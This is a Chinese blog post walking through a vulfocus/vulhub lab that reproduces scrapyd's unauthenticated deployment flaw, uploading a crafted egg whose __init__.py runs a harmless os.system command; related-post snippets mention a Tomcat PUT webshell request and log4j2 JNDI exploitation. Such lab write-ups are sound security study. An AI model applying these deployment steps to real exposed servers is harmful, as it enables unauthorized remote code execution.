【vulfocus漏洞复现】scrapyd 未授权访问漏洞

已于 2022-03-14 14:47:19 修改
阅读量7k 收藏 2
点赞数
分类专栏: vulhub&vulfocus漏洞复现 文章标签: 网络安全
于 2022-03-14 14:45:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/123478111
版权

漏洞介绍:

scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。

​参考:https://www.leavesongs.com/PENETRATION/attack-scrapy.html

环境搭建:

本次实验攻击机器kali(192.168.111.130),受害机器docker

1.拉取docker

cd  /home/kali/桌面/vulhub/scrapy/scrapyd-unacc
sudo docker-compose up -d

2.查看端口映射信息

sudo docker ps

3.在浏览器中输入http://192.168.111.130:6800/

漏洞复现:

1.输入下面命令安装对应库

pip install scrapy scrapyd-client

2.创建一个scrapyd项目

scrapy startproject sss

 输入完成之后在当前路径下就会产生一个名字为sss文件

3. 在__init__.py中加入恶意代码

第一次找__init__.py感觉很懵,不知道在哪,结果问了问小伙伴,才知道该文件在sss/sss/目录下

输入:

sudo vi __init__.py

然后往文件里面写入恶意命令:

import os
os.system('touch test')

 4.之后在返回到sss/目录下对scrapyd-client文件进行编辑

5.输入

pip install scrapyd-client

紧接着对项目进行打包

scrapyd-deploy --build-egg=sss.egg

 6.最后输入

curl http://192.168.111.130:6800/addversion.json -F project=haha -F version=r01 -F egg=@sss.egg

7.结果可以看出touch test 被执行

 

FlynnAAAA
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
scrapyd 授权访问漏洞getshell
ST________的博客
05-27 491
scrapyd 授权访问漏洞getshell 简介 scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接:https://www.leavesongs.com/PENETRATION/attack-scrapy.html 漏洞 访问http://192.168.1.182:6800/,漏洞存在 本地安装scrapy框架,并创建一个scrapy项目: pip
通过vulfocus靶场--log4j2漏洞
weixin_55843787的博客
05-11 3398
vulfocus靶场、log4j2漏洞
scrapyd 授权访问漏洞
EC_Carrot的博客
07-27 646
漏洞简介 scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考文章:https://www.leavesongs.com/PENETRATION/attack-scrapy.html 漏洞 构造一个恶意的scrapy包,构造前需要安装scrapy与scrapyd-client: pip install scrapy pip install scrapyd-clie
[漏洞]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 536
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境,这个vulfocus上没有体出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
Vulfocus靶场漏洞系列—1
tlovejr的博客
03-02 5801
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
Vulfocus漏洞】tomcat-cve_2017_12615
weixin_45632448的博客
04-07 459
访问目标 http://123.58.236.76:15450/ burp抓包 修改请求方式为PUT,增加POST请求体 PUT /shell.jsp/ HTTP/1.1 Host: 123.58.236.76:15450 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
vulfocus漏洞】Spring boot (CVE-2021_21234)
一剑开天门!的博客
03-02 5267
vulfocus漏洞】Spring boot (CVE-2021_21234)
Vulfocus漏洞】spring-core-rce-2022-03-29
weixin_45632448的博客
04-15 5279
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。 通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。 漏洞利用条件 1、A
scrapyd 部署项目说被被拒绝访问
de20050138的博客
09-19 319
修改访问地址为0.0.0.0 后就可以部署成功 Python目录下\Python36\Lib\site-packages\scrapyd的default_scrapyd.conf 解决方法的来源
vulfocus Apache log4j2-RCE 漏洞(CVE-2021-44228)
qq_45780190的博客
12-15 4997
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
[Vulfocus解题系列] 所漏洞总结
热门推荐
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然了一些漏洞,但是过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明过,却忘了,那多不好意思。 已Vulfocus靶场漏洞 Struts2-052远程代码执行(CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
VulfocusSpring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1635
VulfocusSpring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
vulfocus:log4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4390
log4j2远程rce漏洞
漏洞-rsync-授权访问vulfocus/rsync-common
10-16 1248
【rsync-授权访问
vulfocus漏洞
最新发布
08-21
根据引用的描述,已Vulfocus靶场漏洞有spring代码执行(CVE-2018-1273)。该漏洞是指当使用Spring Framework版本4.3.5之前的应用程序中使用了Expression Language(SpEL)的功能时,攻击者可以通过构造特定的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值